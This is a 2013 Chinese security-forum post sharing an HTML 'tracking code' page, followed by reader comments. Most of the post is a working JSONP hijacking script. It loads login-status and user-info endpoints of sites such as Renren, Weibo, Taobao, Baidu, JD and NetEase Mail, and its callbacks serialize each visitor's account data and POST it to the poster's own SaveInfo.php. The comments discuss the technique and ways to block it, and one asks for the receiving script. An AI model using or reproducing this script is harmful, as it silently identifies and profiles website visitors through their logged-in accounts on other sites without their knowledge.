追踪代码

<html>

<head>

<title>test</title>

</head>

<body>

<strong>It works</strong>

<script type="text/javascript">

var pid = 20130906003345;

var random = 60113;

function GetObjString(obj) {

	if (typeof(obj) != 'object') {

		return obj;

	}

	var retstr = '{ ';

	for (fld in obj) {

		retstr += '{ ' + fld + '=' + GetObjString(obj[fld]) + " }\n";

	}

	retstr += ' }';

	return retstr;

}

function ProcessDataInner(obj, subject) {

	var objstr = GetObjString(obj);

	objstr = escape(objstr);

	SendDataToServer(objstr, subject);

}

function createXHR() {

	// Checks whether support XMLHttpRequest or not.

	if (typeof XMLHttpRequest != "undefined") {

		return new XMLHttpRequest();

	}

	// IE6 and elder version.

	else if (typeof ActiveXObject != "undefined") {

		if (typeof arguments.callee.activeXString != "string") {

			var versions = ["MSXML2.XMLHttp6.0", "MSXML2.XMLHttp3.0", "MSXML2.XMLHttp"];

			for (var i = 0; i < versions.length; i++) {

				try {

					var xhr = new ActiveXObject(versions[i]);

					arguments.callee.activeXString = versions[i];

					return xhr;

				} catch(ex) {

					throw new Error(ex.toString());

				}

			}

			return new ActiveXObject(arguments.callee.activeXString);

		} else {

			throw new Error("No XHR object available");

		}

	}

	return null;

}

function SendDataToServer(Data, subject) {

	var req = createXHR();

	if (req != null) {

		req.onreadystatechange = function() {

			if (req.readyState == 4) {}

		};

		req.open("POST", "SaveInfo.php", true);

		req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

		req.send('data=' + Data + '&pid=' + pid + '&random=' + random + '&subject=' + subject, false);

	}

}

function GetDataFromServer(Url, Method, Data) {

	// Creates a XMLHttpRequest object.

	if (Method == null || Method == '') {

		Method = 'GET';

	}

	if (Url == null || Url == '') {

		return '';

	}

	var req = new createXHR();

	if (req != null) {

		req.open(Method, Url, false);

		if (Method == 'POST' || Data != null) {

			req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

		}

		req.send(Data);

		return req.responseText;

	}

	return '';

}

function renren(obj) {

	ProcessDataInner(obj, 1);

}

function jingdong(obj) {

	ProcessDataInner(obj, 2);

}

function tianya(bl, obj) {

	ProcessDataInner(obj, 3);

}

function weibo(obj) {

	ProcessDataInner(obj, 4);

}

function vancl(obj) {

	ProcessDataInner(obj, 6);

}

function netease_mail(obj) {

	ProcessDataInner(obj, 7);

}

function mop(obj) {

	ProcessDataInner(obj, 9);

}

function taobao_nick(obj) {

	ProcessDataInner(obj, 13);

}

function baidu(obj) {

	ProcessDataInner(obj, 14);

}

function renren_all(obj) {

	ProcessDataInner(obj, 15);

}

function jingdong_history(obj) {

	ProcessDataInner(obj, 16);

}

function baidu_all(obj) {

	ProcessDataInner(obj, 17);

}

</script>

<script src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=renren"></script>

<script src="http://passport.360top.com/call/checkHello?callback=jingdong"></script>

<script src="http://passport.tianya.cn/online/checkuseronline.jsp?callback=tianya"></script>

<script src="http://weibo.com/ajaxlogin.php?fmelogin=1&callback=weibo"></script>

<script src="http://my.vancl.com/user/getusernamebycookie?vancl"></script>

<script>ProcessDataInner(getUserName,6);</script>

<script src="http://mailfriends.mail.163.com/mailfriends/webApi.do?json={"event":"logon"}&callback=netease_mail"></script>

<script src="http://passport.mop.com/common/user-info?callback=mop"></script>

<script src="http://tmm.taobao.com/member/birth_show.do?from=www.tmall.com&callback=taobao_nick"></script>

<script src="http://fm.baidu.com/dev/api/?tn=playlist&format=jsonp&id=1&callback=baidu"></script>

<script src="http://passport.game.renren.com/user/info?callback=renren_all"></script>

<script src="http://my.360buy.com/book/track.action?jsoncallback=jingdong_history"></script>

<script src="http://zhidao.baidu.com/api/loginInfo?callback=baidu_all"></script>

</body>

</html>

你懂的

@核攻击

[原文地址]

相关讨论：

1#

Ivan | 2013-09-08 12:36

搞個快照神馬的……

2#

Hackx7 | 2013-09-08 12:36

好牛逼的样子

3#

无敌L.t.H (:?门安天京北爱我) | 2013-09-08 12:47

拒绝第三方

4#

luom | 2013-09-08 12:49

这尼玛大陷阱啊

5#

Sogili (.) 长短短 () | 2013-09-08 13:29

ctrl+shift+n 打开隐身窗口

6#

liner (/) | 2013-09-08 13:36

7#

猪猪侠 (A) | 2013-09-08 13:43

很好。

8#

xsser (十根阳具有长短!!) | 2013-09-08 14:24

撸主，百度甚至可以取得关键广告，知道你喜好的哈

9#

safe121 (--黑阔娱乐群：328034840) | 2013-09-08 14:30

@xsser 我在想，chrome的Block third-party cookies and site data是否有效。

感觉这个方法是 Cookie Stuffing

10#

一只猿 (恭喜你又中奖了！！) | 2013-09-08 14:38

@xsser 如何拒绝百度获取，有没有好的方法

11#

x7iao (宇宙黑阔。) | 2013-09-08 16:12

撸主 有接收端吗

12#

想要减肥的胖纸 | 2013-09-08 16:29

我又不做违法的事情。为什么会怕追踪呢。

13#

低调 | 2013-09-08 17:07

@xsser 一般网站联盟连男的女的 多大岁数 文化程度 都能分析出来 呵呵

核攻击 | 2013-09-12 10:49

WTF